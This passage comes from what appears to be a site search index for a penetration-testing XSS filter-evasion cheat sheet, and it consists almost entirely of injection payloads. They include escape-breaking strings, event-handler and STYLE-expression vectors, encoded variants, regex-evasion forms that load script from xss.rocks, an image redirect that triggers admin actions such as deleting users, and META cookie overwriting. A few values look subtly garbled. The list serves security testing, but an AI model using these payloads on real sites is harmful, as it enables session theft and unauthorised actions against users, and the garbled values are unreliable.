and you want to inject your own JavaScript into it but the server side application escapes certain quotes you can circumvent that by escaping their escape character. When this gets injected it will read <SCRIPT>var a=\"\\\\\\\\\";alert('XSS');//\";</SCRIPT>
which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire. The XSS locator uses this method.:
`\\\";alert('XSS');//`\n
An alternative, if correct JSON or Javascript escaping has been applied to the embedded data but not HTML encoding, is to finish the script block and start your own:
</script><script>alert('XSS');</script>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#end-title-tag", "title": "End Title Tag", "text": "This is a simple XSS vector that closes <TITLE>
tags, which can encapsulate the malicious cross site scripting attack:
</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#input-image", "title": "INPUT Image", "text": "<input type=\"IMAGE\" src=\"javascript:alert('XSS');\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#body-image", "title": "BODY Image", "text": "<body background=\"javascript:alert('XSS')\"></body>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#img-dynsrc", "title": "IMG Dynsrc", "text": "<img DYNSRC=\"javascript:alert('XSS')\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#img-lowsrc", "title": "IMG Lowsrc", "text": "<img LOWSRC=\"javascript:alert('XSS')\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#list-style-image", "title": "List-style-image", "text": "Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector:
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS</br>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#vbscript-in-an-image", "title": "VBscript in an Image", "text": "<img src='vbscript:msgbox(\"XSS\")' />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#livescript-older-versions-of-netscape-only", "title": "Livescript (older versions of Netscape only)", "text": "<img src=\"livescript:[code]\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#svg-object-tag", "title": "SVG Object Tag", "text": "<svg/onload=alert('XSS')>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#ecmascript-6", "title": "ECMAScript 6", "text": "Set.constructor`alert\\x28document.domain\\x29\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#body-tag", "title": "BODY Tag", "text": "Method doesn't require using any variants of javascript:
or <SCRIPT...
to accomplish the XSS attack). Dan Crowley additionally noted that you can put a space before the equals sign (onload=
!= onload =
):
<BODY ONLOAD=alert('XSS')>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#event-handlers", "title": "Event Handlers", "text": "It can be used in similar XSS attacks to the one above (this is the most comprehensive list on the net, at the time of this writing). Thanks to Rene Ledosquet for the HTML+TIME updates.
FSCommand()
(attacker can use this when executed from within an embedded Flash object) onAbort()
(when user aborts the loading of an image) onActivate()
(when object is set as the active element) onAfterPrint()
(activates after user prints or previews print job) onAfterUpdate()
(activates on data object after updating data in the source object) onBeforeActivate()
(fires before the object is set as the active element) onBeforeCopy()
(attacker executes the attack string right before a selection is copied to the clipboard - attackers can do this with the execCommand(\"Copy\")
function) onBeforeCut()
(attacker executes the attack string right before a selection is cut) onBeforeDeactivate()
(fires right after the activeElement is changed from the current object) onBeforeEditFocus()
(Fires before an object contained in an editable element enters a UI-activated state or when an editable container object is control selected) onBeforePaste()
(user needs to be tricked into pasting or be forced into it using the execCommand(\"Paste\")
function) onBeforePrint()
(user would need to be tricked into printing or attacker could use the print()
or execCommand(\"Print\")
function). onBeforeUnload()
(user would need to be tricked into closing the browser - attacker cannot unload windows unless it was spawned from the parent) onBeforeUpdate()
(activates on data object before updating data in the source object) onBegin()
(the onbegin event fires immediately when the element's timeline begins) onBlur()
(in the case where another popup is loaded and window looses focus) onBounce()
(fires when the behavior property of the marquee object is set to \"alternate\" and the contents of the marquee reach one side of the window) onCellChange()
(fires when data changes in the data provider) onChange()
(select, text, or TEXTAREA field loses focus and its value has been modified) onClick()
(someone clicks on a form) onContextMenu()
(user would need to right click on attack area) onControlSelect()
(fires when the user is about to make a control selection of the object) onCopy()
(user needs to copy something or it can be exploited using the execCommand(\"Copy\")
command) onCut()
(user needs to copy something or it can be exploited using the execCommand(\"Cut\")
command) onDataAvailable()
(user would need to change data in an element, or attacker could perform the same function) onDataSetChanged()
(fires when the data set exposed by a data source object changes) onDataSetComplete()
(fires to indicate that all data is available from the data source object) onDblClick()
(user double-clicks a form element or a link) onDeactivate()
(fires when the activeElement is changed from the current object to another object in the parent document) onDrag()
(requires that the user drags an object) onDragEnd()
(requires that the user drags an object) onDragLeave()
(requires that the user drags an object off a valid location) onDragEnter()
(requires that the user drags an object into a valid location) onDragOver()
(requires that the user drags an object into a valid location) onDragDrop()
(user drops an object (e.g. file) onto the browser window) onDragStart()
(occurs when user starts drag operation) onDrop()
(user drops an object (e.g. file) onto the browser window) onEnd()
(the onEnd event fires when the timeline ends. onError()
(loading of a document or image causes an error) onErrorUpdate()
(fires on a databound object when an error occurs while updating the associated data in the data source object) onFilterChange()
(fires when a visual filter completes state change) onFinish()
(attacker can create the exploit when marquee is finished looping) onFocus()
(attacker executes the attack string when the window gets focus) onFocusIn()
(attacker executes the attack string when window gets focus) onFocusOut()
(attacker executes the attack string when window looses focus) onHashChange()
(fires when the fragment identifier part of the document's current address changed) onHelp()
(attacker executes the attack string when users hits F1 while the window is in focus) onInput()
(the text content of an element is changed through the user interface) onKeyDown()
(user depresses a key) onKeyPress()
(user presses or holds down a key) onKeyUp()
(user releases a key) onLayoutComplete()
(user would have to print or print preview) onLoad()
(attacker executes the attack string after the window loads) onLoseCapture()
(can be exploited by the releaseCapture()
method) onMediaComplete()
(When a streaming media file is used, this event could fire before the file starts playing) onMediaError()
(User opens a page in the browser that contains a media file, and the event fires when there is a problem) onMessage()
(fire when the document received a message) onMouseDown()
(the attacker would need to get the user to click on an image) onMouseEnter()
(cursor moves over an object or area) onMouseLeave()
(the attacker would need to get the user to mouse over an image or table and then off again) onMouseMove()
(the attacker would need to get the user to mouse over an image or table) onMouseOut()
(the attacker would need to get the user to mouse over an image or table and then off again) onMouseOver()
(cursor moves over an object or area) onMouseUp()
(the attacker would need to get the user to click on an image) onMouseWheel()
(the attacker would need to get the user to use their mouse wheel) onMove()
(user or attacker would move the page) onMoveEnd()
(user or attacker would move the page) onMoveStart()
(user or attacker would move the page) onOffline()
(occurs if the browser is working in online mode and it starts to work offline) onOnline()
(occurs if the browser is working in offline mode and it starts to work online) onOutOfSync()
(interrupt the element's ability to play its media as defined by the timeline) onPaste()
(user would need to paste or attacker could use the execCommand(\"Paste\")
function) onPause()
(the onpause event fires on every element that is active when the timeline pauses, including the body element) onPopState()
(fires when user navigated the session history) onProgress()
(attacker would use this as a flash movie was loading) onPropertyChange()
(user or attacker would need to change an element property) onReadyStateChange()
(user or attacker would need to change an element property) onRedo()
(user went forward in undo transaction history) onRepeat()
(the event fires once for each repetition of the timeline, excluding the first full cycle) onReset()
(user or attacker resets a form) onResize()
(user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>
) onResizeEnd()
(user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>
) onResizeStart()
(user would resize the window; attacker could auto initialize with something like: <SCRIPT>self.resizeTo(500,400);</SCRIPT>
) onResume()
(the onresume event fires on every element that becomes active when the timeline resumes, including the body element) onReverse()
(if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward) onRowsEnter()
(user or attacker would need to change a row in a data source) onRowExit()
(user or attacker would need to change a row in a data source) onRowDelete()
(user or attacker would need to delete a row in a data source) onRowInserted()
(user or attacker would need to insert a row in a data source) onScroll()
(user would need to scroll, or attacker could use the scrollBy()
function) onSeek()
(the onreverse event fires when the timeline is set to play in any direction other than forward) onSelect()
(user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(\"SelectAll\");
) onSelectionChange()
(user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(\"SelectAll\");
) onSelectStart()
(user needs to select some text - attacker could auto initialize with something like: window.document.execCommand(\"SelectAll\");
) onStart()
(fires at the beginning of each marquee loop) onStop()
(user would need to press the stop button or leave the webpage) onStorage()
(storage area changed) onSyncRestored()
(user interrupts the element's ability to play its media as defined by the timeline to fire) onSubmit()
(requires attacker or user submits a form) onTimeError()
(user or attacker sets a time property, such as dur, to an invalid value) onTrackChange()
(user or attacker changes track in a playList) onUndo()
(user went backward in undo transaction history) onUnload()
(as the user clicks any link or presses the back button or attacker forces a click) onURLFlip()
(this event fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file) seekSegmentTime()
(this is a method that locates the specified point on the element's segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.) ", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#bgsound", "title": "BGSOUND", "text": "<bgsound SRC=\"javascript:alert('XSS');\"></bgsound>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#javascript-includes", "title": "& JavaScript includes", "text": "<br SIZE=\"&{alert('XSS')}\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#style-sheet", "title": "STYLE sheet", "text": "<link rel=\"stylesheet\" href=\"javascript:alert('XSS');\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#remote-style-sheet", "title": "Remote style sheet", "text": "Using something as simple as a remote style sheet you can include your XSS as the style parameter can be redefined using an embedded expression. This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page:
<link rel=\"stylesheet\" href=\"http://xss.rocks/xss.css\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#remote-style-sheet-part-2", "title": "Remote style sheet part 2", "text": "This works the same as above, but uses a <STYLE>
tag instead of a <LINK>
tag). A slight variation on this vector was used to hack Google Desktop. As a side note, you can remove the end </STYLE>
tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world:
<style>\n@import 'http://xss.rocks/xss.css';\n</style>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#remote-style-sheet-part-3", "title": "Remote style sheet part 3", "text": "This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky. According to RFC2616 setting a link header is not part of the HTTP1.1 spec, however some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://xss.rocks/xss.css>; REL=stylesheet
) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox:
<meta http-equiv=\"Link\" content=\"<http://xss.rocks/xss.css>; REL=stylesheet\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#remote-style-sheet-part-4", "title": "Remote style sheet part 4", "text": "This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefor is vulnerable to this for the vast majority of sites:
<style>\nBODY {\n-moz-binding: url('http://xss.rocks/xssmoz.xml#xss');\n}\n</style>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#style-tags-with-broken-up-javascript-for-xss", "title": "STYLE Tags with Broken-up JavaScript for XSS", "text": "This XSS at times sends IE into an infinite loop of alerts:
<style>\n@im \\port'\\ja\\vasc\\ript:alert(\"XSS\")';\n</style>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#style-attribute-using-a-comment-to-break-up-expression", "title": "STYLE Attribute using a Comment to Break-up Expression", "text": "Created by Roman Ivanov
<img style=\"xss:expr/*XSS*/ession(alert('XSS'))\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#img-style-with-expression", "title": "IMG STYLE with Expression", "text": "This is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like above this can send IE into a loop:
exp/*<a\n style='no\\xss:noxss(\"*//*\");\nxss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'\n></a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#style-tag-older-versions-of-netscape-only", "title": "STYLE Tag (Older versions of Netscape only)", "text": "<style type=\"text/javascript\">\nalert('XSS');\n</style>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#style-tag-using-background-image", "title": "STYLE Tag using Background-image", "text": "<style>\n.XSS {\nbackground-image: url(\"javascript:alert('XSS')\");\n}</style\n><a class=\"XSS\"></a>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#style-tag-using-background", "title": "STYLE Tag using Background", "text": "<style type=\"text/css\">\nBODY {\nbackground: url(\"javascript:alert('XSS')\");\n}</style\n>` `<style type=\"text/css\">\nBODY {\nbackground: url(\"<javascript:alert>('XSS')\");\n}\n</style>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#anonymous-html-with-style-attribute", "title": "Anonymous HTML with STYLE Attribute", "text": "IE6.0 and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter:
<XSS STYLE=\"xss:expression(alert('XSS'))\"></XSS>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#local-htc-file", "title": "Local htc File", "text": "This is a little different than the above two cross site scripting vectors because it uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute:
<XSS STYLE=\"behavior: url(xss.htc);\"></XSS>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#us-ascii-encoding", "title": "US-ASCII Encoding", "text": "US-ASCII encoding (found by Kurt Huwig).This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding.
`\u00bcscript\u00bealert(\u00a2XSS\u00a2)\u00bc/script\u00be`\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#meta", "title": "META", "text": "The odd thing about meta refresh is that it doesn't send a referrer in the header - so it can be used for certain types of attacks where you need to get rid of referring URLs:
<meta http-equiv=\"refresh\" content=\"0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#iframe", "title": "IFRAME", "text": "If iframes are allowed there are a lot of other XSS problems as well:
<iframe src=\"javascript:alert('XSS');\"></iframe>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#iframe-event-based", "title": "IFRAME Event Based", "text": "IFrames and most other elements can use event based mayhem like the following... (Submitted by: David Cross)
<iframe src=\"#\" onmouseover=\"alert(document.cookie)\"></iframe>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#frame", "title": "FRAME", "text": "Frames have the same sorts of XSS problems as iframes
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#table", "title": "TABLE", "text": "<table BACKGROUND=\"javascript:alert('XSS')\"></table>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#td", "title": "TD", "text": "Just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors:
<table>\n <td BACKGROUND=\"javascript:alert('XSS')\"></td>\n</table>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#div", "title": "DIV", "text": "", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#div-background-image", "title": "DIV Background-image", "text": "<div style=\"background-image: url(javascript:alert('XSS'))\"></div>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#div-background-image-with-unicoded-xss-exploit", "title": "DIV Background-image with Unicoded XSS Exploit", "text": "This has been modified slightly to obfuscate the url parameter. The original vulnerability was found by Renaud Lifchitz as a vulnerability in Hotmail:
<div\n style=\"background-image:\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028.1027\\0058.1053\\0053\\0027\\0029'\\0029\"\n></div>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#div-background-image-plus-extra-characters", "title": "DIV Background-image Plus Extra Characters", "text": "Rnaske built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279):
<div style=\"background-image: url(javascript:alert('XSS'))\"></div>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#div-expression", "title": "DIV Expression", "text": "A variant of this was effective against a real world cross site scripting filter using a newline between the colon and \"expression\":
<div style=\"width: expression(alert('XSS'));\"></div>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#downlevel-hidden-block", "title": "Downlevel-Hidden Block", "text": "Only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore does not need to be removed, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job:
<!--[if gte IE 4]>\n <script>\n alert('XSS');\n </script>\n<![endif]-->\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#base-tag", "title": "BASE Tag", "text": "Works in IE and Netscape 8.1 in safe mode. You need the //
to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like images/image.jpg
rather than full paths. If the path includes a leading forward slash like /images/image.jpg
you can remove one slash from this vector (as long as there are two to begin the comment this will work):
<base href=\"javascript:alert('XSS');//\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#object-tag", "title": "OBJECT Tag", "text": "If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag). The linked file is actually an HTML file that can contain your XSS:
<object type=\"text/x-scriptlet\" data=\"http://xss.rocks/scriptlet.html\"></object>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#embed-svg-which-contains-xss-vector", "title": "EMBED SVG Which Contains XSS Vector", "text": "This example only works in Firefox, but it's better than the above vector in Firefox because it does not require the user to have Flash turned on or installed. Thanks to nEUrOO for this one.
<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#using-actionscript-inside-flash-for-obfuscation", "title": "Using ActionScript Inside Flash for Obfuscation", "text": "a = 'get';\nb = 'URL(\"';\nc = 'javascript:';\nd = \"alert('XSS');\\\")\";\neval(a + b + c + d);\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#xml-data-island-with-cdata-obfuscation", "title": "XML Data Island with CDATA Obfuscation", "text": "This XSS attack works only in IE and Netscape 8.1 in IE rendering engine mode) - vector found by Sec Consult while auditing Yahoo:
<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML>\n<SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#locally-hosted-xml-with-embedded-javascript-that-is-generated-using-an-xml-data-island", "title": "Locally hosted XML with embedded JavaScript that is generated using an XML data island", "text": "This is the same as above but instead referrs to a locally hosted (must be on the same server) XML file that contains your cross site scripting vector. You can see the result here:
<XML SRC=\"xsstest.xml\" ID=I></XML>\n<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#htmltime-in-xml", "title": "HTML+TIME in XML", "text": "This is how Grey Magic hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work:
<html>\n <body>\n <?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">\n <?import namespace=\"t\" implementation=\"#default#time2\">\n <t:set attributeName=\"innerHTML\" to=\"XSS\n <script defer>\n alert('XSS');\n </script>\n \">\n </body>\n</html>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#assuming-you-can-only-fit-in-a-few-characters-and-it-filters-against-js", "title": "Assuming you can only fit in a few characters and it filters against .js
", "text": "You can rename your JavaScript file to an image as an XSS vector:
<script src=\"http://xss.rocks/xss.jpg\"></script>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#ssi-server-side-includes", "title": "SSI (Server Side Includes)", "text": "This requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues:
<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://xss.rocks/xss.js></SCRIPT>'\"-->\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#php", "title": "PHP", "text": "Requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues:
<? echo('<SCR)';\necho('IPT>alert(\"XSS\")</SCRIPT>'); ?>\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#img-embedded-commands", "title": "IMG Embedded Commands", "text": "This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc.... This is one of the lesser used but more useful XSS vectors:
<img src=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#img-embedded-commands-part-ii", "title": "IMG Embedded Commands part II", "text": "This is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal <IMG SRC=\"httx://badguy.com/a.jpg\">
could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this):
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#cookie-manipulation", "title": "Cookie Manipulation", "text": "Admittedly this is pretty obscure but I have seen a few examples where <META
is allowed and you can use it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc...):
<meta http-equiv=\"Set-Cookie\" content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\" />\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#utf-7-encoding", "title": "UTF-7 Encoding", "text": "If the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov for this one). Click here for an example (you don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 in IE rendering engine mode). This does not work in any modern browser without changing the encoding type which is why it is marked as completely unsupported. Watchfire found this hole in Google's custom 404 script.:
<head>\n <meta http-equiv=\"CONTENT-TYPE\" content=\"text/html; charset=UTF-7\" /></head\n>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-`\n
", "tags": ["penetration-testing", "tools", "cheatsheet"]}, {"location": "penetration-testing/cheatsheets/xss-cheatsheet/#xss-using-html-quote-encapsulation", "title": "XSS Using HTML Quote Encapsulation", "text": "This was tested in IE, your mileage may vary. For performing XSS on sites that allow <SCRIPT>
but don't allow <SCRIPT SRC...
by way of a regex filter /\\<script\\[^\\>\\]+src/i
:
<script a=\">\" src=\"httx://xss.rocks/xss.js\"></script>\n
For performing XSS on sites that allow <SCRIPT>
but don't allow \\<script src...
by way of a regex filter /\\<script((\\\\s+\\\\w+(\\\\s\\*=\\\\s\\*(?:\"(.)\\*?\"|'(.)\\*?'|\\[^'\"\\>\\\\s\\]+))?)+\\\\s\\*|\\\\s\\*)src/i
(this is an important one, because I've seen this regex in the wild):
<script =\">\" src=\"httx://xss.rocks/xss.js\"></script>\n
Another XSS to evade the same filter, /\\<script((\\\\s+\\\\w+(\\\\s\\*=\\\\s\\*(?:\"(.)\\*?\"|'(.)\\*?'|\\[^'\"\\>\\\\s\\]+))?)+\\\\s\\*|\\\\s\\*)src/i
:
<SCRIPT a=\">\" '' SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>\n
Yet another XSS to evade the same filter, /\\<script((\\\\s+\\\\w+(\\\\s\\*=\\\\s\\*(?:\"(.)\\*?\"|'(.)\\*?'|\\[^'\"\\>\\\\s\\]+))?)+\\\\s\\*|\\\\s\\*)src/i
. I know I said I wasn't goint to discuss mitigation techniques but the only thing I've seen work for this XSS example if you still want to allow <SCRIPT>
tags but not remote script is a state machine (and of course there are other ways to get around this if they allow <SCRIPT>
tags):
<SCRIPT \"a='>'\" SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>\n
And one last XSS attack to evade, /\\<script((\\\\s+\\\\w+(\\\\s\\*=\\\\s\\*(?:\"(.)\\*?\"|'(.)\\*?'|\\[^'\"\\>\\\\s\\]+))?)+\\\\s\\*|\\\\s\\*)src/i
using grave accents (again, doesn't work in Firefox):
<script a=\"`\">\n` SRC=\"httx://xss.rocks/xss.js\">\n</script>\n
Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly:
<script a=\">'>\" src=\"httx://xss.rocks/xss.js\"></script>\n
This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content:
<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"httx://xss.rocks/xss.js\"></SCRIPT>\n
